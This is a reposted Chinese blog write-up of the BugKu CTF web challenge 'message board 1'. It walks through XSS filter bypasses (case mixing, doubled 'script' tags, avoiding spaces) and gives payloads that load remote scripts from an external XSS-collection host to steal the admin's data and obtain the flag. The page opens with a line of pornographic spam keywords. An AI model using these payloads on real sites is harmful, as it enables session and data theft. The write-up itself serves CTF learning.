国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

BUGKU-WEB 留言板1

2年前作者:默默提升實(shí)驗(yàn)室分類:Toy博客閱讀(115)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了BUGKU-WEB 留言板1。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

題目描述

題目截圖如下:

BUGKU-WEB 留言板1,# BUGKU,BUGKU

進(jìn)入場景看看:
BUGKU-WEB 留言板1,# BUGKU,BUGKU

解題思路

  • 之間寫過一題類似的,所以這題應(yīng)該是有什么不同的
  • 那就按照之前的思路進(jìn)行測試試試
  • 提示說:需要xss平臺(tái)接收flag,這個(gè)和之前說的提示一樣

相關(guān)工具

  • xss平臺(tái):https://xssaq.com
  • 對(duì)xss的一些繞過進(jìn)行學(xué)習(xí)了解

解題步驟

  1. 輸入測試一下script代碼:
<script>alert(1)</script>

發(fā)現(xiàn)script被過濾了,script被替換為空。參考:str_replace()函數(shù):將字符串中的指定字符替換為其他字符
BUGKU-WEB 留言板1,# BUGKU,BUGKU
2. 換個(gè)大小寫的試試:

<ScRipt>ALeRt(XSS);</sCRipT>

BUGKU-WEB 留言板1,# BUGKU,BUGKU
還是被過濾了!,大小寫繞過!

  1. 使用雙寫試試
<scscriptript>alert('z')</scscriptript>

解釋:將中間的script替換為空,剩下的結(jié)合后又是script可以成功繞過。

BUGKU-WEB 留言板1,# BUGKU,BUGKU
所以確定了過濾方式之后,找個(gè)xss平臺(tái)(https://xssaq.com)測試一下:
BUGKU-WEB 留言板1,# BUGKU,BUGKU
之后測試其中的代碼,始終沒有反應(yīng):
極限短碼(好像不行):

<scsCRiPtript/SrC=//uj.ci/qoe>

這個(gè)好像可以正常:

<scsCRiPtript/sRC=//uj.ci/v9o></scsCRiPtript>

然后在評(píng)論區(qū)發(fā)現(xiàn),管理員說xss平臺(tái)需要http模式的…
BUGKU-WEB 留言板1,# BUGKU,BUGKU
然后我找了半天沒有找到這個(gè)http的平臺(tái),但是當(dāng)我再次看這個(gè)平臺(tái)的時(shí)候,哦豁出來又!也就是說https其實(shí)也可以,只是比較慢而已?
BUGKU-WEB 留言板1,# BUGKU,BUGKU

PS:除了會(huì)大小繞過之外,其實(shí)還會(huì)對(duì)空格進(jìn)行繞過。所以需要注意我們的測試代碼中沒有空格或者使用·/·,來繞過對(duì)空格的限制。

BUGKU-WEB 留言板1,# BUGKU,BUGKU

得到Flag

flag{772af954ed340063c935a60d92093504}

BUGKU-WEB 留言板1,# BUGKU,BUGKU

新知識(shí)點(diǎn)

  • XSS篇——XSS過濾繞過技巧

BUGKU-WEB 留言板1,# BUGKU,BUGKU

  • xss各種姿勢的學(xué)習(xí)(包含繞過)和個(gè)人重要總結(jié)

BUGKU-WEB 留言板1,# BUGKU,BUGKU
對(duì)此,需要重點(diǎn)學(xué)習(xí)一下!

有用的話,請(qǐng)點(diǎn)贊收藏評(píng)論,幫助更多的同學(xué)哦文章來源地址http://www.zghlxwxcb.cn/news/detail-833438.html

到了這里,關(guān)于BUGKU-WEB 留言板1的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包